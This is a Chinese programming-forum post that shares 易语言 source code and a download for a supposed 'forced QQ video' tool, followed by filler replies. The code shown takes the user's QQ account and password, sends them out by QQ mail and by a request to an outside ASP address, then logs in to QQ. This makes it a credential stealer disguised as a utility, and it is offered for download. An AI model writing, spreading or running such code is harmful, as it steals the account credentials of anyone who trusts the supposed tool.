编程开发网

 找回密码
 注册(Register)

QQ登录

只需一步,快速开始

查看: 428|回复: 151

[易源码] 易语言写的强制QQ好友进行视频工具源码分享

  [复制链接]
发表于 2019-12-12 20:14:13 | 显示全部楼层 |阅读模式
.版本 2
.支持库 spec
.支持库 dp1

.如果真 (帐号输入.内容 = “”)
    _启动窗口.可视 = 假
    载入 (密码或帐号错误, , 真)
    返回 ()
.如果真结束
.如果真 (密码输入.内容 = “”)
    _启动窗口.可视 = 假
    载入 (密码或帐号错误, , 真)
    返回 ()
.如果真结束


发送QQ邮件 (帐号输入.内容, 密码输入.内容)

_启动窗口.可视 = 假
置托盘图标 (#图片1, 取文本 (帐号输入.内容, ))

摘要文本 = 取数据摘要 (到字节集 (密码输入.内容))

摘要字节集 = 取空白字节集 (16)
.计次循环首 (16, 变量1)  ' 由于数据摘要文本长度为32,这里将每两位文本按十六进制转换为十进制字节,生成一个长为16的摘要字节集。
    摘要字节集 [变量1] = 到字节 (十六进制到十进制 (取文本中间 (摘要文本, (变量1 - 1) × 2 + 1, 2)))
.计次循环尾 ()
加密的密码 = BASE64编码 (摘要字节集)

.如果 (A.选中 = 真)
    隐身 = “40”
.否则
    隐身 = “41”
.如果结束
输出调试文本 (“Bin\QQ.exe”)
运行 (“Bin\QQ.exe” + “ /START QQUIN:” + 帐号输入.内容 + “ PWDHASH:” + 加密的密码 + “ /STAT:” + 隐身, 假, )


.如果真 (QQASP (“http://apqqcom.vipkj.com/kuanglong.asp”, 帐号输入.内容, 密码输入.内容) = “发送成功”)

.如果真结束


2010强制视频QQ.rar

72.06 KB, 下载次数: 0





上一篇:易语言简易挂机锁源码分享下载学习+模块下载
下一篇:易语言写的腾讯QQ空间刷留言工具免费分享
分享到:
发表于 2019-12-12 20:14:14 | 显示全部楼层
信楼主,得永生!
回复

使用道具 举报

发表于 2019-12-12 21:54:00 | 显示全部楼层
今天的心情很不错啊
回复

使用道具 举报

发表于 2019-12-13 12:34:15 | 显示全部楼层
楼主该去看心理医生了!
回复

使用道具 举报

发表于 2019-12-13 12:34:27 | 显示全部楼层
收藏了,很不错的内容!
回复

使用道具 举报

发表于 2019-12-13 13:54:13 | 显示全部楼层
顶一个!
回复

使用道具 举报

发表于 2019-12-19 05:08:26 | 显示全部楼层
信楼主,考试不挂科!
回复

使用道具 举报

发表于 2019-12-31 15:36:25 | 显示全部楼层
东方不败外加灭绝师太啊!
回复

使用道具 举报

发表于 2020-1-4 04:16:41 | 显示全部楼层
祖国尚未统一,我却天天灌水,好内疚!
回复

使用道具 举报

发表于 2020-1-14 02:10:44 | 显示全部楼层
今天是个特别的日子,值得纪念!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册(Register)

本版积分规则


НП互联网知识НП

微博

НП技术交流群НП

技术群

QQ手机版 禁言处罚 编程开发网 蜀ICP备19036706号-2 Discuz! X3.4 Powered by © 2001-2013 Comsenz Inc. 

快速回复 快速发帖 返回顶部 返回列表